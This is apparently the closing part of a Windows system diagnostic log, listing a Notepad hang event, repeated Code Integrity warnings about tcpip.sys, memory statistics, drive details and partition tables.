Error: (07/10/2015 12:45:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: NOTEPAD.EXE6.1.7600.163853d0001d0bb2f96ea4aa31C:\Windows\system32\NOTEPAD.EXEfb46b891-2722-11e5-8e24-001c26dd0d2e


CodeIntegrity Errors:
===================================
  Date: 2013-11-07 18:55:46.144
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:46.052
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.937
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.823
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.722
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.631
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22713_none_0fbe86f737e6a8d6\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.506
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22665_none_0f8a7609380d6a12\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.415
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22665_none_0f8a7609380d6a12\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.310
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22665_none_0f8a7609380d6a12\tcpip.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-11-07 18:55:45.214
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.0.6001.22665_none_0f8a7609380d6a12\tcpip.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz
Percentage of memory in use: 72%
Total physical RAM: 6134.99 MB
Available physical RAM: 1670.61 MB
Total Virtual: 12268.18 MB
Available Virtual: 6785.34 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.76 GB) (Free:39.27 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (NEW_VOLUME) (CDROM) (Total:3.01 GB) (Free:0 GB) UDF
Drive i: (DATAPART1) (Fixed) (Total:465.76 GB) (Free:389 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 1C34E0A3)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 295E10B3)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of log ============================